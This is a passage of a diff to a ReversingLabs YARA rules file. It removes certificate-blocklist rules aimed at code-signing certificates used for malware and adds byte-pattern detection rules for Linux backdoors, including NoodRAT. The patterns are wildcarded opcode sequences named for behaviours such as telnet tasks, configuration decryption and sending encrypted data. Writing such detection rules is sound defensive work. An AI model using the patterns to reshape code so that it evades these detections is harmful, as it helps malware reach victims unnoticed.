+            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 89 DF BB ?? ?? ?? ?? 48 89 C2 48 8D 05 ?? ?? ?? ?? 48 89 D1 E8
+            ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 48 89 7C 24 ?? 48 89
+            4C 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B
+            9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ??
+            ?? ?? ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 49 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54
+            24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF
+            ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 90 48 8D 05 ?? ??
+            ?? ?? 66 90 E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 50 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48
+            8B 54 24 ?? 48 89 10 90 EB ?? 48 89 C7 48 8B 54 24 ?? E8 ?? ?? ?? ?? 31 DB 48 8D 0D
+            ?? ?? ?? ?? 48 89 C7 31 C0 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 5C
+        }
+		$network_communication_tcp_p2 = {
+            24 ?? 48 89 44 24 ?? 44 0F 11 7C 24 ?? 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ?? 48 89
+            4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ?? 31 C0 48
+            8D 5C 24 ?? B9 ?? ?? ?? ?? 48 89 CF E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 0F 1F 40 ??
+            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 48 8B 4C 24 ?? 48 89 48 ?? 83 3D ?? ??
+            ?? ?? ?? 90 75 ?? 48 8B 54 24 ?? 48 89 50 ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 58 ?? EB
+            ?? 48 8D 78 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8D 78 ?? 48 8B 9C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 31 C9 31 FF 48 8B AC 24 ??
+            ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? E8 ??
+            ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24
+        }
+		$telnet_task_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
+            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ??
+            ?? 4C 89 54 24 ?? 4C 89 5C 24 ?? 48 89 9C 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 4C
+            89 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4F ?? 48 89 F0 FF D1 48 89 C3 31
+            C0 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24
+            ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89
+            8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
+            48 8D 8C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ??
+            0F 1F 40 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 90 44 0F 11 7C 24 ?? 48 8D 0D ?? ?? ?? ??
+            48 89 4C 24 ?? 48 B9 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 4C 24 ?? 90 48 C7 44 24 ?? ?? ??
+            ?? ?? C6 44 24 ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? C6 44 24 ?? ?? 48 8D 05 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 48 8B 8C 24 ?? ?? ?? ?? 48 89
+            48 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 50 ?? 48 8B 54 24 ??
+            48 89 50 ?? EB ?? 48 8D 78 ?? 48 8B 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 78 ?? 48
+            8B 54 24 ?? E8 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 94 24 ??
+            ?? ?? ?? 48 8D 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 89 C3 48 8D 8C 24 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? 48 89 FE 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 94 24 ?? ??
+            ?? ?? 48 85 D2 74 ?? 48 8B 8C 24 ?? ?? ?? ?? 31 DB E9 ?? ?? ?? ?? 44 0F 11 7C 24
+        }
+		$telnet_task_p2 = {
+            48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 54 24 ?? 48 8B 1D ??
+            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ??
+            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 8B
+            44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8D 1D ?? ?? ?? ?? 0F 1F 40 ?? E8 ?? ?? ??
+            ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 74 24 ?? 48 83 C6 ?? 48 89
+            CB 48 89 F1 48 89 5C 24 ?? 48 89 4C 24 ?? 0F 10 01 0F 11 84 24 ?? ?? ?? ?? 0F 10 41
+            ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 41 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 41 ?? 0F 11 84
+            24 ?? ?? ?? ?? 48 8B 44 24 ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ??
+            0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24
+            ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 0F 1F 44 00 ?? E8 ?? ?? ?? ?? 48 8D 1D
+            ?? ?? ?? ?? 48 89 C1 48 8B 44 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 94
+            24 ?? ?? ?? ?? 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24
+            ?? 48 89 4C 24 ?? 48 89 7C 24 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 4C 89
+            54 24 ?? 4C 89 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ??
+            48 8B 7C 24 ?? 48 8B 74 24 ?? 4C 8B 44 24 ?? 4C 8B 4C 24 ?? 4C 8B 54 24
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Korist Networks Incorporated" and pe.signatures [ i ] . serial == "36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" and 1600069289 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $get_local_address_p* ) ) and ( all of ( $get_mac_address_p* ) ) and ( all of ( $network_communication_tcp_p* ) ) and ( all of ( $telnet_task_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ee678930D5Bdfaa2Ab0172Fa4C10Ae07 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Noodrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects NoodRAT backdoor."
 		author = "ReversingLabs"
-		id = "e2c2c34a-6177-5457-9ed9-fa34f82ee4cd"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ac5eae27-dc42-5060-b639-c23c0bbabb50"
+		date = "2024-08-26"
+		modified = "2024-08-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5346-L5364"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.NoodRAT.yara#L1-L162"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f1e254450fdbe94172a4fa2d2727c3ade5ae436cf4c0c1153a15e9a2f64f2452"
+		logic_hash = "2ec4a8ba7428054edb4dcdb6a00015b9758badf515f2c210bb946ba5402674d2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "NoodRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEX CORPORATION PTY LTD" and ( pe.signatures [ i ] . serial == "00:ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" or pe.signatures [ i ] . serial == "ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" ) and 1571011200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_D7C432E8D4Edef515Bfb9D1C214Ff0F5 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "5aed508e-2da1-52a0-98f3-52e903e95b7d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5366-L5384"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "63741513f3ab2f51ecd66dc973239c9dc194b86504fe26b2dd4a7f31299e5497"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$change_name_on_system_p1 = {
+            41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 FB 48 8D BC 24 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 0F B7 15
+            ?? ?? ?? ?? 66 89 55 ?? 4C 8D 65 ?? 0F B7 D2 BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ??
+            48 8D 94 24 ?? ?? ?? ?? 0F B7 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ??
+            4C 89 E6 48 89 EF E8 ?? ?? ?? ?? 4C 8B 03 48 C7 C6 ?? ?? ?? ?? 4C 89 C7 B8 ?? ?? ??
+            ?? 48 89 F1 F2 AE 48 F7 D1 48 8D 14 31 48 89 EF 48 89 F1 F2 AE 48 89 CE 48 F7 D6 48
+            83 EE ?? 48 39 F2 72 ?? BE ?? ?? ?? ?? 4C 89 C7 E8 ?? ?? ?? ?? 48 89 EE 48 8B 3B E8
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ??
+            48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 B8 ?? ?? ?? ?? 48 85
+            D2 0F 8E ?? ?? ?? ?? 48 C7 C2 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE 48
+        }
+		$change_name_on_system_p2 = {
+            89 CB 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE F7 D3 8D 5C 0B ?? 85 DB B8 ?? ?? ?? ??
+            0F 4E D8 48 8D B4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48
+            89 EF B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 8D 79 ?? 48 63 D3 48 63
+            FF 48 8D 7C 3D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ??
+            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ??
+            C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 49 89 C6 48
+            8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 89 E7 B9 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? F3 48 AB C6 07 ?? 48 89 E5 41 BC ?? ?? ?? ?? 41 BD ?? ?? ??
+            ?? EB ?? 48 89 EF 4C 89 E9 4C 89 E0 F3 48 AB C6 07 ?? 48 89 D9 BA ?? ?? ?? ?? BE ??
+            ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 7E ?? 48 63 D0 4C 89 F1 BE ?? ?? ?? ?? 48 89
+            E7 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89
+            F7 E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 85 C0 7E
+            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3
+        }
+		$decrypt_configuration_p1 = {
+            41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 9C 24 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DF F3 48 AB C6 07 ?? 48 8D 54 24 ?? B1 ??
+            48 89 D7 F3 48 AB C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44
+            24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 54 24 ?? 0F B7 35 ?? ??
+            ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ??
+            ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 BE ??
+            ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? C6 44 24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89
+            DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 50 ?? 48 89 54 24 ?? C6 00 ?? 48
+            8D 74 24 ?? 48 89 D7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 48 ?? 48 89 4C
+            24 ?? C6 00 ?? 48 8D 74 24 ?? 48 89 CF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84
+            ?? ?? ?? ?? C6 00 ?? 48 8D B4 24 ?? ?? ?? ?? 48 C7 C5 ?? ?? ?? ?? 48 89 F7 41 BC ??
+            ?? ?? ?? 48 89 E9 44 89 E0 F2 AE 48 F7 D1 48 01 E9 48 8D 5C 24 ?? 48 81 F9 ?? ?? ??
+            ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 89 DF E8 ?? ?? ?? ?? 48 89 DF 48 89 E9 44 89 E0 F2
+            AE 48 89 CD 48 F7 D5 83 ED ?? 8D 45 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C5 C6 44 04
+            ?? ?? 83 C5 ?? 48 63 ED C6 44 2C ?? ?? 4C 8D 6C 24 ?? 4C 89 EB BD ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 41 BC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 49 C7 C6 ?? ?? ?? ?? 4D 89 EF E9 ?? ?? ?? ?? 0F B6 03 3C ?? 75
+            ?? 44 8B 64 24 ?? 4D 6B E4 ?? 4C 03 64 24 ?? 49 8D 7C 24 ?? 83 7C 24 ?? ?? BA ?? ??
+            ?? ?? 0F 4E 54 24 ?? 48 63 D2 8B 74 24 ?? 48 8D 44 24 ?? 48 8D 34 30 E8
+        }
+		$decrypt_configuration_p2 = {
+            0F B7 54 24 ?? 66 41 89 54 24 ?? 83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? 41
+            BC ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 66 89 44 24 ?? 44 89 64 24 ?? EB ?? 41 83 C4 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 F1
+            4C 89 FF B8 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82
+            ?? ?? ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 48 89 DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7
+            D1 48 8D 51 ?? 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 44
+            24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ?? ??
+            80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B
+            44 24 ?? C6 80 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48 8B 54 24 ?? C6 82 ?? ?? ?? ??
+            ?? 80 7C 24 ?? ?? 75 ?? 48 8B 4C 24 ?? C6 81 ?? ?? ?? ?? ?? 80 7C 24 ?? ?? 75 ?? 48
+            8B 44 24 ?? C6 80 ?? ?? ?? ?? ?? 48 8D 5C 24 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 89
+            DF F3 48 AB 48 8B 7C 24 ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 48 83 E9 ?? 48 81 F9
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F 46 D1 48 8B 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? C6 44
+            24 ?? ?? C6 44 24 ?? ?? 48 8D 74 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ??
+            ?? ?? 48 8D 7C 24 ?? B8 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? F2 AE 48 F7 D1 83 E9 ?? 8D
+        }
+		$decrypt_configuration_p3 = {
+            41 ?? 48 98 80 7C 04 ?? ?? 74 ?? 48 63 C1 C6 44 04 ?? ?? 83 C1 ?? 48 63 C9 C6 44 0C
+            ?? ?? 4C 89 EB BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49 C7
+            C4 ?? ?? ?? ?? 4C 8D 74 24 ?? 41 BF ?? ?? ?? ?? EB ?? 0F B6 03 3C ?? 75 ?? 8B 7C 24
+            ?? 48 8D 54 24 ?? 48 8D 3C 3A BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24
+            ?? 48 81 C2 ?? ?? ?? ?? 48 8B 4C 24 ?? 66 89 44 91 ?? 0F B7 44 24 ?? 66 89 44 91 ??
+            83 44 24 ?? ?? 83 7C 24 ?? ?? 77 ?? 89 6C 24 ?? EB ?? 3C ?? 75 ?? 48 8D 7B ?? BA ??
+            ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 44 24 ?? 83 C5 ?? 48 83 C3 ?? 4C 89 E1
+            4C 89 F7 44 89 F8 F2 AE 48 F7 D1 48 83 E9 ?? 48 89 D8 4C 29 E8 48 39 C8 0F 82 ?? ??
+            ?? ?? 8B 4C 24 ?? 48 8B 54 24 ?? 89 8A ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? C7 80 ?? ??
+            ?? ?? ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C7 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 BA ?? ?? ?? ?? 0F 4E C2 48 8B 54 24 ?? 89 82 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            EB ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$encrypt_and_send_data = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74 24 ?? 4C 89 7C
+            24 ?? 48 83 EC ?? 41 89 FC 48 89 F5 49 89 D6 41 89 CD 48 85 F6 0F 84 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89 03
+            0F B6 45 ?? 88 43 ?? 8B 6B ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? BA ??
+            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 BA ?? ?? ?? ?? 48 89 DE 44
+            89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? 48
+            89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 ED 74
+            ?? 4D 85 F6 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 4C 63 FD 4C 89 FF E8 ?? ?? ?? ?? 48 89 C3 48 85 C0 74 ?? 4C 89 FA 4C 89
+            F6 48 89 C7 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 EE 48 89 DF E8 ?? ?? ?? ?? 44 89 E9 89
+            EA 48 89 DE 44 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 3D ?? ?? ?? ?? 48 83 C7 ?? E8
+            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 48 8B 3D ?? ?? ?? ?? 48 83
+            C7 ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 48
+            8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 4C 8B 7C 24
+            ?? 48 83 C4 ?? C3
+        }
+		$receive_and_decrypt_data = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 83 EC ?? 41 89 FC 48
+            89 F3 49 89 D5 89 CD 48 85 F6 74 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ??
+            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 8B 53 ?? 85 D2 74 ?? 4D 85 ED 75 ??
+            B8 ?? ?? ?? ?? EB ?? 81 FA ?? ?? ?? ?? 77 ?? 89 E9 4C 89 EE 44 89 E7 E8 ?? ?? ?? ??
+            85 C0 74 ?? 8B 73 ?? BA ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8
+            ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ??
+            C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"MILKY PUT\"" and ( pe.signatures [ i ] . serial == "00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" or pe.signatures [ i ] . serial == "d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" ) and 1601596800 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( all of ( $change_name_on_system_p* ) ) and ( all of ( $decrypt_configuration_p* ) ) and ( $encrypt_and_send_data ) and ( $receive_and_decrypt_data ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5B440A47E8Ce3Dd202271E5C7A666C78 : INFO FILE
